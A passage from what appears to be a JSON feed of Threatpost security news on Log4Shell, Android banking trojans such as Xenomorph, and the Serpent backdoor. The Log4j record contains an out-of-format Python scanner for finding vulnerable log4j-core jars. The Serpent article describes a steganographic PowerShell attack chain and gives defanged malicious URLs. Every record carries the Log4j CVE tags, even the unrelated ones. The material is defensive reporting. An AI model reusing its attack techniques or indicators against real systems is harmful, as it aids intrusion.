"2022-01-19T13:31:38", "description": "It\u2019s not my intention to be 
alarmist about the Log4j vulnerability ([CVE-2021-44228](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-44228>)), known as Log4Shell, but this one is pretty bad. \n\nFirst of all, Log4j is a ubiquitous logging library that runs on millions of computers. Second, the director of the U.S. Cybersecurity & Infrastructure Security Agency (CISA) says this is the [most serious vulnerability](<https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896>) she has ever seen in her career spanning decades, and many security experts agree. Third, researchers say that cyberattackers are already exploiting the vulnerability hundreds of times _every minute_. The fact is, Log4Shell is relatively easy to exploit, so even low-skilled hackers can take advantage.\n\nOK, maybe it is time for alarm.\n\nLog4j is open-source software from the Apache Software Foundation. [As explained by The Conversation](<https://theconversation.com/what-is-log4j-a-cybersecurity-expert-explains-the-latest-internet-vulnerability-how-bad-it-is-and-whats-at-stake-173896>), this logging library is widely used to record events such as routine system operations and errors, and to communicate diagnostic messages regarding those events. A feature in Log4j, message lookups, lets a log message contain ${...} expressions that Log4j evaluates as the message is written. One of those lookups, JNDI, makes the logging host fetch a Java object from a server named in the expression. Because attacker-supplied input such as a User-Agent header is routinely logged, an attacker can name a server of their own and have the targeted computer load and run code from it. The result of an exploit for the bug is that an attacker can control a targeted server remotely.\n\n## **Attackers Took Early Advantage**\n\nWithin weeks of the flaw\u2019s public disclosure in early December, it was already reported that nation-state actors linked to North Korea, China, Iran and other countries had created toolkits for mass-exploiting this vulnerability quickly. 
Log4Shell also became a darling of the ransomware and botnet gangs operating around the globe. A real danger in this flaw is that there are so many ways to exploit it for malicious purposes.\n\nHow prevalent is Log4j in business systems? [Analysis by Wiz and Ernst & Young](<https://blog.wiz.io/10-days-later-enterprises-halfway-through-patching-log4shell/>) of more than 200 enterprise cloud environments with thousands of cloud accounts showed that 93 percent of those environments are at risk from the vulnerability. \n\n[Google researchers discovered](<https://www.securityweek.com/google-finds-35863-java-packages-using-defective-log4j>) that more than 8 percent of all packages on Maven Central, a large Java package repository, have at least one version that is impacted by this vulnerability\u2014an \u201cenormous\u201d amount by all standards of ecosystem impact. \n\nSo, yeah, that\u2019s pretty extensive presence of this vulnerability. As for the global impact, it\u2019s still too early to tell. Much will depend on how well organizations respond to the threat.\n\n## **Everyone Must Take Action**\n\nFor everyone affected by this, there is both a business and moral imperative to take immediate steps to mitigate the vulnerability if it exists within public-facing systems. Naturally, no business wants its systems to be vulnerable to an attack that can lead to the corruption or theft of data and the potential for severe business disruption. 
\n\nAs for the moral imperative, the Federal Trade Commission points out that [companies have a responsibility to take steps \u201cto reduce the likelihood of harm to consumers.\u201d](<https://www.ftc.gov/news-events/blogs/techftc/2022/01/ftc-warns-companies-remediate-log4j-security-vulnerability>) With the fallout from the Equifax breach still fresh in memory, the FTC warns that it \u201cintends to use its full legal authority to pursue companies that fail to take reasonable steps to protect consumer data from exposure as a result of Log4j, or similar known vulnerabilities in the future.\u201d Not every company serves consumers, of course, but that shouldn\u2019t matter with regard to addressing this issue.\n\nCISA issued a list of [\u201cimmediate actions\u201d](<https://www.cisa.gov/uscert/apache-log4j-vulnerability-guidance>) that organizations must undertake to remediate the risks posed by Log4Shell. The top action is to understand the extent of the problem by identifying which of your assets use the Log4j software and then apply an appropriate patch. Stop the bleed, so to speak. \n\nAfter that, you must assume you have already been compromised, hunt for signs of malicious activity within your systems, and continue to monitor for odd traffic patterns or behavior that could be indicative of an ongoing attack. \n\nIt\u2019s essential to detect the threat activity as the vulnerability is exploited or as attackers successfully insert themselves into your environment. This is where the efficacy of your security tools is put to the test.\n\n## **How Effective Are Your Security Tools?**\n\nSecurity tools that are dependent on traditional rule-based detection and pattern matching may have easily caught some of the commands being executed by injected malware in the early days of this exploit. 
However, as variants of Log4Shell hit the wild with better execution tactics, traditional security information and event management (SIEM) and extended detection and response (XDR) tools may struggle to identify attacks unless tool vendors make very frequent updates to the rule base. And that just isn\u2019t practical. Taking a layered security approach that includes some advanced detection methods such as machine learning, artificial intelligence and behavior analytics will also be crucial.\n\nEvery organization should have a mitigation plan in case something like this comes up again in the future. Whether it be to shut down the offending piece of software, or immediately patch it and test the patch before it goes back into production, teams need to be prepared for a proactive response within hours or even minutes. \n\nLog4Shell is a wake-up call for everyone. We shouldn\u2019t hit the snooze button until the next vulnerability comes around.\n\n_**Saryu Nayyar is CEO at [Gurucul](<https://gurucul.com/>). 
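The first of the CISA actions above, working out which assets carry Log4j, is harder than it sounds: log4j-core is usually buried inside an application's .war or fat .jar rather than installed on its own, so a package-manager query misses most copies. The Python below is an added example, not CISA's or Gurucul's code. It walks an archive recursively, reads the version Maven records in log4j-core's pom.properties, checks whether the JndiLookup class is still present (deleting it from the jar was the documented mitigation where patching was not immediately possible), and rates each copy against the CVE-2021-44228 fix versions (2.15.0, plus the 2.12.2 and 2.3.1 backports for older Java runtimes). The .war it scans is constructed in memory with placeholder class bytes.

```python
import io
import re
import zipfile
from typing import Dict, List, Optional, Tuple

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPS = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
NESTED = (".jar", ".war", ".ear", ".zip")


def parse_version(v: str) -> Tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); a pre-release such as '2.0-beta9' gets patch -1 so it sorts below 2.0."""
    m = re.match(r"(\d+)\.(\d+)(?:\.(\d+))?(-.*)?$", v.strip())
    if not m:
        raise ValueError(f"unrecognised version {v!r}")
    return int(m.group(1)), int(m.group(2)), (-1 if m.group(4) else int(m.group(3) or 0))


def affected_by_44228(v: Tuple[int, int, int]) -> bool:
    """CVE-2021-44228 affects log4j-core 2.0-beta9 through 2.14.1; fixed in 2.15.0,
    with backports 2.12.2 (Java 7) and 2.3.1 (Java 6). Log4j 1.x is not affected by it."""
    major, minor, patch = v
    if major != 2:
        return False
    if minor == 3:
        return patch < 1
    if minor == 12:
        return patch < 2
    return (minor, patch) < (15, 0)


def scan_archive(data: bytes, path: str, depth: int = 0,
                 findings: Optional[List[Dict[str, object]]] = None) -> List[Dict[str, object]]:
    """Recursively inspect a zip-based archive and record every log4j-core it contains."""
    if findings is None:
        findings = []
    if depth > 6 or not data.startswith(b"PK\x03\x04"):
        return findings
    try:
        zf = zipfile.ZipFile(io.BytesIO(data))
    except zipfile.BadZipFile:
        return findings
    names = zf.namelist()
    version = None
    if POM_PROPS in names:                 # Maven writes the artifact coordinates here at build time
        for line in zf.read(POM_PROPS).decode("utf-8", "replace").splitlines():
            if line.startswith("version="):
                version = line.split("=", 1)[1].strip()
    has_jndi = JNDI_LOOKUP_CLASS in names
    if version or has_jndi:
        if not has_jndi:
            status = "mitigated"           # JndiLookup.class removed from the jar
        elif version is None:
            status = "review"              # class present but version unknown (shaded or relocated)
        elif affected_by_44228(parse_version(version)):
            status = "vulnerable"
        else:
            status = "patched"
        findings.append({"path": path, "version": version, "jndi_lookup": has_jndi, "status": status})
    for name in names:                     # descend into bundled jars (WEB-INF/lib, fat jars)
        if name.lower().endswith(NESTED):
            scan_archive(zf.read(name), f"{path}!/{name}", depth + 1, findings)
    return findings


def build_log4j_core(version: str, keep_jndi_lookup: bool = True) -> bytes:
    """Construct a stand-in log4j-core jar: real pom.properties layout, placeholder class bytes."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(POM_PROPS, f"#Generated by Maven\nversion={version}\n"
                               "groupId=org.apache.logging.log4j\nartifactId=log4j-core\n")
        if keep_jndi_lookup:
            zf.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe placeholder")
    return buf.getvalue()


def build_sample_war() -> bytes:
    """A constructed .war bundling three copies of log4j-core in different states."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1.jar", build_log4j_core("2.14.1"))
        zf.writestr("WEB-INF/lib/log4j-core-2.17.1.jar", build_log4j_core("2.17.1"))
        zf.writestr("WEB-INF/lib/log4j-core-2.14.1-nojndi.jar", build_log4j_core("2.14.1", keep_jndi_lookup=False))
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_archive(build_sample_war(), "app.war"):
        print(f"{f['status']:<10} {f['version'] or '?':<8} {f['path']}")
```

Point it at every .war, .ear and fat .jar on a host (and at container image layers) rather than trusting filenames: shaded builds rename the jar but usually keep pom.properties, and a "review" verdict is the cue to open the archive by hand.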
\n**_**_ \nEnjoy additional insights from Threatpost\u2019s Infosec Insiders community by visiting our [microsite](<https://threatpost.com/microsite/infosec-insiders-community/>)._**\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-18T20:21:04", "type": "threatpost", "title": "The Log4j Vulnerability Puts Pressure on the Security World", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-01-18T20:21:04", "id": "THREATPOST:8A372065BFA1E6839DAF0386E9D8A1F5", "href": "https://threatpost.com/log4j-vulnerability-pressures-security-world/177721/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T21:23:04", "description": "The number of cyberattacks launched against mobile users was down last year, researchers have found \u2014 but don\u2019t pop the champagne just yet. 
The decline was offset by jacked-up, more sophisticated, more nimble mobile nastiness.\n\nIn a Monday [report](<https://securelist.com/mobile-malware-evolution-2021/105876/>), Kaspersky said that its researchers have observed a downward trend in the number of attacks on mobile users, as shown in the chart below. However, \u201cattacks are becoming more sophisticated in terms of both malware functionality and vectors,\u201d according to Kaspersky experts Tatyana Shiskova and Anton Kivva.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2022/02/22151706/downware-mobile-malware-trend-e1645561041683.png>)\n\nNumber of attacks on mobile users, 2019\u20132021. Source: Kaspersky.\n\n\u201cIn the reporting period, after a surge in H2 2020, cybercriminal activity gradually abated: There were no global newsbreaks or major campaigns, and the COVID-19 topic began to fade,\u201d according to Monday\u2019s report. \u201cAt the same time, new players continue to emerge on the cyberthreat market as malware becomes more sophisticated; thus, the fall in the overall number of attacks is \u2018compensated\u2019 by the greater impact of a successful attack. Most dangerous of all in this regard are [banking malware](<https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/>) and [spyware](<https://threatpost.com/new-android-spyware-poses-pegasus-like-threat/176155/>).\u201d\n\nThe company\u2019s mobile products and technologies detected 97,661 new mobile banking trojans, along with 3,464,756 malicious installation packages and 17,372 new mobile ransomware trojans.\n\nThe number of malicious installation packages observed in 2021 actually dropped substantially, down 2,218,938 from 2020 and slightly down from the 3,503,952 packages discovered in 2019.\n\n## New Tricks for Mobile Banking Malware\n\nLast year, banking trojans learned a number of new tricks. 
For example, the Fakecalls banker, which targets Korean mobile users, is now \u201c[dropping] outgoing calls to the victim\u2019s bank and plays pre-recorded operator responses stored in the trojan\u2019s body,\u201d according to the report.\n\nOther old dogs learning new tricks include the Sova banker, which steals[ cookies](<https://encyclopedia.kaspersky.com/glossary/cookie/?utm_source=securelist&utm_medium=blog&utm_campaign=termin-explanation>), \u201cenabling attackers to access the user\u2019s current session and personal mobile banking account without knowing the login credentials.\u201d\n\nIn 2021, cybercriminals also went after mobile gaming credentials \u2013 which are often sold later on the darknet or used to steal in-game goods from users. Last year, for example, marked the first time that researchers spotted what they called a[ \u201cGamethief-type mobile trojan](<https://securelist.com/it-threat-evolution-q1-2021-mobile-statistics/102547/#quarterly-highlights>),\u201d aimed at stealing account credentials for the mobile version of PlayerUnknown\u2019s Battlegrounds (PUBG).\n\nAs well, the Vultur backdoor \u2013 found packed into a malicious, fully functional two-factor authentication (2FA) app discovered last month on Google Play \u2013 picked up the capability of using Virtual Network Computing (VNC) to snoop on targets by recording smartphone screens: \u201cWhen the user opens an app that is of interest to attackers, they can monitor the on-screen events,\u201d researchers said.\n\nOther trends spotted in 2021: fewer pandemic/COVID-19 topics used as bait, and more pop-culture lures, such as Squid Game. 
Kaspersky pointed to the [Joker trojan](<https://threatpost.com/updated-joker-malware-android-apps/167776/>) on Google Play, which was found masquerading \u201cas an app with a background wallpaper in the style of Squid Game.\u201d\n\n## Google Play Still Infested\n\nSpeaking of the malware-ridden Play Store, regardless of Google\u2019s attempts to scrub its app store clean, it\u2019s still a bit of a roach motel. ThreatFabric researchers recently sniffed out 300,000 banking trojan [infections](<https://threatpost.com/banking-trojan-infections-google-play/176630/>) in Google Play during a four-month period.\n\nKaspersky also called out what it said were \u201crepeat incidents of malicious code injection into popular apps through advertising SDKs,\u201d as in the \u201csensational\u201d case of [CamScanner](<https://threatpost.com/malicious-app-tallies-100-million-downloads/147748/>): a malicious app spotted in the Google Play store in August 2019 that tallied 100 million downloads.\n\nResearchers noted that they also found [malicious code](<https://threatpost.com/sophisticated-android-spyware-google-play/155202/>) inside ad libraries in [the official client](<https://securelist.com/apkpure-android-app-store-infected/101845/>) for the third-party marketplace known as APKpure, as well as in a [modified WhatsApp build](<https://threatpost.com/custom-whatsapp-build-malware/168892/>).\n\nOne example was particularly alarming, from a security hygiene perspective: the malicious, fully functional 2FA app that hung out in Google Play for [more than two weeks](<https://threatpost.com/2fa-app-banking-trojan-google-play/178077/>), managing to cling to 10,000 downloads. It came loaded with the Vultur stealer malware that targets and swoops down on financial data.\n\nAmong all of last year\u2019s many banking-trojans moves, researchers found the resurgence of Joker especially notable. 
The [malware](<https://threatpost.com/malicious-joker-app-downloads-google-play/177139/>), which zaps victims with premium SMS charges, popped up yet again on Google Play, in a mobile app called Color Message, after which it snuck into more than a half-million downloads before the store collared it.\n\nKaspersky researchers also called out the [Facestealer](<https://blog.malwarebytes.com/detections/android-trojan-spy-facestealer/>) trojan: a family of Android trojans that uses social engineering to rip off victims\u2019 Facebook credentials.\n\nThese trojans most commonly sneak into Google Play by masquerading as a legitimate app, such as a photo editor or VPN service, to which they add a small code snippet to decrypt and launch their payload, the researchers explained. To confound analysis, such malware often uses a command-and-control (C2) server to send unpacking commands that get carried out in multiple steps: \u201cEach decrypted module contains the address of the next one, plus instructions for decrypting it,\u201d they said.\n\n## Most of It\u2019s Still Adware\n\nAt 42 percent, adware was yet again the biggest slice of the mobile malware pie, even though it fell 14.83 percentage points over the prior year. In 2020, adware was also the No. 1 mobile menace, at 57 percent.\n\nNext in prevalence were potentially unwanted riskware apps at 35 percent: a share increase of 14 percentage points, after a sharp decline in 2019\u20132020. As [defined](<https://usa.kaspersky.com/resource-center/threats/riskware>) by Kaspersky, riskware is legitimate software \u201cthat pose potential risks due to security vulnerability, software incompatibility or legal violations.\u201d\n\nIn third place were trojan threats at 9 percent: a share that rose by 4 percentage points year-over-year.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T21:00:36", "type": "threatpost", "title": "Gaming, Banking Trojans Dominate Mobile Malware Scene", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T21:00:36", "id": "THREATPOST:CEEE25A4A4491980FA1ECB491795DBA9", "href": "https://threatpost.com/gaming-banking-trojans-mobile-malware/178571/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-22T18:08:28", "description": "An Android trojan dubbed Xenomorph has nested in Google Play, already racking up more than 50,000 downloads from the official app store, researchers warned. For anyone who downloaded the \u201cFast Cleaner\u201d app, it\u2019s time to nuke it from orbit.\n\nAccording to a ThreatFabric analysis, Xenomorph has a target list of 56 different European banks, for which it provides convincing facsimiles of log-in pages whenever a victim attempts to log into a mobile banking app. The goal, of course, is to steal any credentials that victims enter into the faux log-in overlay.\n\nHowever, the malware is also a flexible, modular banking trojan, which has code overlaps and other ties to the Alien malware \u2013 hence the name. It notably contains the ability to abuse Android\u2019s accessibility services for broad control over a device\u2019s capabilities, which could open the door to dangerous features that go beyond hijacking mobile banking credentials.\n\n\u201cThe Accessibility engine powering this malware, together with the infrastructure and command-and-control (C2) protocol, are carefully designed to be scalable and updatable,\u201d the researchers warned in a [Monday posting](<https://www.threatfabric.com/blogs/xenomorph-a-newly-hatched-banking-trojan.html>). \u201cThe information stored by the logging capability of this malware is very extensive, and if sent back to the C2 server, could be used to implement keylogging, as well as collecting behavioral data on victims and on installed applications, even if they are not part of the list of targets.\u201d\n\nThat advanced functionality is not yet implemented, so the researchers have deemed Xenomorph still under development. 
However, they noted that it\u2019s already making a mark on the banking trojan front: \u201cXenomorph is already sporting effective overlays [for banking apps] and being actively distributed on official app stores.\u201d\n\nIt also uses SMS and notification interception to log and use potential two-factor authentication (2FA) tokens, according to ThreatFabric. And, they added, \u201cIt would be unsurprising to see this bot sport semi-automatic transfer system (ATS) capabilities in the very near future.\u201d\n\nATS is the process of automatically initiating wire transfers from the victims without needing to use credentials, thus bypassing 2FA and all anti-fraud measures.\n\nThreatFabric observed the malware being loaded by a dropper hiding in a Google Play application called \u201cFast Cleaner\u201d (since reported to Google). Sporting 50,000 installations, it purported to remove unused clutter and battery optimization blocks for better device processing times.\n\n\u201cThis is not an uncommon lure, and we have seen malware families like Vultur and Alien being deployed by such application[s],\u201d the researchers said.\n\n## **Inside the Shell: Xenomorph\u2019s Core Functionality**\n\nIn terms of its main overlay attack vector, Xenomorph is powered by Accessibility Services privileges, the researchers found.\n\n\u201cOnce the malware is up and running on a device, its background services receive Accessibility events whenever something new happens on the device,\u201d they explained in a Monday posting. \u201cIf the application opened is part of the list of targets, then Xenomorph will trigger an overlay injection and show a WebView Activity posing as the targeted package.\u201d\n\nMore specifically, once installed, the malware enumerates and sends back a list of installed packages on the infected device. 
Based on what targeted applications are present, it goes on to download the corresponding overlays to inject.\n\n\u201cThe list of overlay targets returned by Xenomorph includes targets from Spain, Portugal, Italy and Belgium, as well as some general purpose applications like emailing services, and cryptocurrency wallets,\u201d according to ThreatFabric.\n\nAfter obtaining Accessibility Services privileges, Xenomorph will first register and verify itself with the C2, by sending a request using the legitimate, open-source project Retrofit2 (a type-safe REST client for Android, Java and Kotlin developed by Square).\n\nThat first message contains the initial information exfiltrated about the device, according to ThreatFabric. After that, Xenomorph periodically polls for new commands from the C2.\n\nFor now, the commands allow the malware to log SMS messages, list the web injects sent by the C2, enable or disable intercept notifications, and enumerate installed apps.\n\nMeanwhile, the malware also performs the aforementioned logging: \u201cAll the information gathered is only displayed on the local device logs, but in the future a very minor modification would be enough to add keylogging and Accessibility logging capabilities to the malware,\u201d researchers warned.\n\n## **Part of the Alien Franchise?**\n\nThreatFabric\u2019s analysis uncovered evidence of code reuse that links Xenomorph to the known Alien malware, which is a descendent of the [infamous Cerberus malware](<https://threatpost.com/cerberus-banking-trojan-unleashed-google-play/157218/>).\n\nThese include the \u201cuse of the same HTML resource page to trick victims into granting the Accessibility Services privileges.\u201d And further, Xenomorph uses state-tracking through the use of the \u201cSharedPreferences\u201d file.\n\n\u201cThis file is commonly used to track the state of an application,\u201d researchers noted. 
\u201cHowever, the style of variable naming used by Xenomorph is very reminiscent of Alien, despite being potentially even more detailed.\u201d\n\nThey added, \u201cpotentially the most interesting fact is the actual name of the sharedPreferences file used to store the configuration for Xenomorph: the file is named ring0.xml. This might look like any other generic random string, but it happens to coincide with the name of the supposed actor behind the development of the original Alien malware.\u201d\n\nEven though for now Xenomorph is a fairly typical banking trojan, ThreatFabric noted that it does have untapped potential.\n\n\u201cModern banking malware is evolving at a very fast rate, and criminals are starting to adopt more refined development practices to support future updates,\u201d researchers concluded. \u201cXenomorph is at the forefront of this change\u2026ThreatFabric predicts that with some more time to finish development, this malware could reach higher threat levels, comparable to other modern Android banking trojans.\u201d\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-02-22T18:00:30", "type": "threatpost", "title": "Xenomorph Malware Burrows into Google Play Users, No Facehugger Required", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-02-22T18:00:30", "id": "THREATPOST:FC38FE49CDC6DFAD4E78D669DBFA5687", "href": "https://threatpost.com/xenomorph-malware-google-play-facehugger/178563/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-03-22T14:28:59", "description": "Researchers have discovered a cyberattack that uses unusual evasion tactics to [backdoor](<https://threatpost.com/fin8-bank-sardonic-backdoor/168982/>) French organizations with a novel malware dubbed Serpent, they said.\n\nA team from Proofpoint observed what they call an \u201cadvanced, targeted threat\u201d that uses email-based lures and malicious files 
typical of many malware campaigns to deliver its ultimate payload to targets in the French construction, real-estate and government industries.\n\nHowever, between initial contact and payload, the attack uses methods to avoid detection that haven\u2019t been seen before, researchers revealed [in a blog post](<https://www.proofpoint.com/us/blog/threat-insight/serpent-no-swiping-new-backdoor-targets-french-entities-unique-attack-chain>) Monday.\n\nThese include the use of a legitimate software package installer called Chocolatey as an initial payload, equally legitimate Python tools that wouldn\u2019t be flagged in network traffic, and a novel detection bypass technique using a Scheduled Task, they said.\n\n\u201cThe ultimate objectives of the threat actor are presently unknown,\u201d Proofpoint researchers Bryan Campbell, Zachary Abzug, Andrew Northern and Selena Larson acknowledged in the post. \u201cSuccessful compromise would enable a threat actor to conduct a variety of activities, including stealing information, obtaining control of an infected host or installing additional payloads.\u201d\n\n## **Serpent: A Slippery Attack Chain**\n\nThe attack chain begins as many [email-based attacks](<https://threatpost.com/ransomware-phishing-emails-segs/176470/>) do\u2014with an email that appears to be coming from a legitimate source that includes a Microsoft Word document containing malicious macros. 
Various parts of the macro include ASCII art that depicts a snake, giving the [backdoor](<https://threatpost.com/tomiris-backdoor-solarwinds-malware/175091/>) its name, researchers said.\n\nThe macro-laden document purports to have important information related to the \u201cr\u00e8glement g\u00e9n\u00e9ral sur la protection des donn\u00e9es (RGPD),\u201d aka the European Union\u2019s General Data Protection Regulations (GDPR), a law which mandates how companies must report data leaks to the government.\n\nIf macros are enabled, the document executes the document\u2019s macro, which reaches out to an image URL\u2013e.g., https://www.fhccu[.]com/images/ship3[.]jpg\u2013that contains a base64 encoded PowerShell script hidden [using steganography](<https://threatpost.com/steganography-combat/143096/>).\n\nThe PowerShell script first downloads, installs and updates the installer package and repository [script](<https://chocolatey.org/install.ps1>) for Chocolatey, a software management automation tool for Windows that wraps installers, executables, .ZIP files and scripts into compiled packages, researchers said.\n\n\u201cLeveraging Chocolatey as an initial payload may allow the threat actor to bypass threat-detection mechanisms because it is a legitimate software package and would not immediately be identified as malicious,\u201d researchers noted.\n\nThe script then uses Chocolatey to install Python, including the [pip](<https://pypi.org/project/pip/>) Python package installer. This component then installs various dependencies including [PySocks](<https://pypi.org/project/PySocks/>), a Python-based reverse proxy client that enables users to send traffic through SOCKS and HTTP proxy servers, researchers said.\n\nNext, the PowerShell script fetches another image file\u2013e.g. https://www.fhccu[.]com/images/7[.]jpg,\u2013which contains a base64 encoded Python script that also is obscured using steganography, they said. 
The PowerShell script saves the Python script as \u201cMicrosoftSecurityUpdate.py\u201d and then creates and executes a .bat file that in turn executes the Python script.\n\nThe attack chain ends with a command to a shortened URL that redirects to the Microsoft Office help website, researchers said. The steganographic images used to hide the scripts are hosted on what appears to be a Jamaican credit-union website, they added.\n\n## **Serpent Backdoor**\n\nOnce successfully installed on a targeted system, the Serpent backdoor periodically pings the \u201corder\u201d server (the first onion[.]pet URL) and expects responses of the form <random integer>\u2013<hostname>\u2013<command>.\n\nIf <hostname> matches the hostname of the infected computer, the infected host runs the command provided by the order server (<command>), researchers said. This could be any Windows command as designated by the attacker, the output of which is then recorded.\n\nNext, Serpent uses PySocks to connect to the command-line Pastebin tool called Termbin, pastes the output to a bin, and receives the bin\u2019s unique URL.\n\nAs its final act, the backdoor sends a request to the \u201canswer\u201d server (a second onion[.]pet URL), including the hostname and bin URL in the header. This allows the attacker to monitor the bin outputs via the \u201canswer\u201d URL and see what the infected host\u2019s response was, researchers observed. 
Once this entire process is complete, Serpent cycles through it indefinitely, they added.\n\n## **Task-Scheduler Evasion Tactic**\n\nIn addition to using steganographic images and the Chocolatey package installer to hide its nefarious activities, the attack also uses what Proofpoint researchers said is a never-before-seen application of signed binary proxy execution using a Scheduled Tasks executable, as \u201can attempt to bypass detection by defensive measures.\u201d\n\nA command that leverages schtasks.exe to create a one-time task to call a portable executable is contained within a Swiper image called ship.jpg after the end-of-file marker, researchers said.\n\n\u201cIn this case the executable is called calc.exe,\u201d researchers wrote in the post. The trigger for this task is contingent on the creation of a Windows event with an EventID of 777, after which the command then creates a dummy event to trigger the task, and deletes the task from the task scheduler as if it never occurred, they said.\n\n\u201cThis peculiar application of tasking logic results in the portable executable being executed as a child process of taskhostsw.exe, which is a signed Windows binary,\u201d researchers said.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-03-22T14:21:42", "type": "threatpost", "title": "Serpent Backdoor Slithers into Orgs Using Chocolatey Installer", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-44228"], "modified": "2022-03-22T14:21:42", "id": "THREATPOST:16624FA0DF55AAB9FDB3C14AC91EC9F5", "href": "https://threatpost.com/serpent-backdoor-chocolatey-installer/179027/", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-02-26T00:10:25", "description": "The group behind the TrickBot malware is back after an unusually long lull between campaigns, according to researchers \u2014 but it\u2019s now operating with diminished activity. 
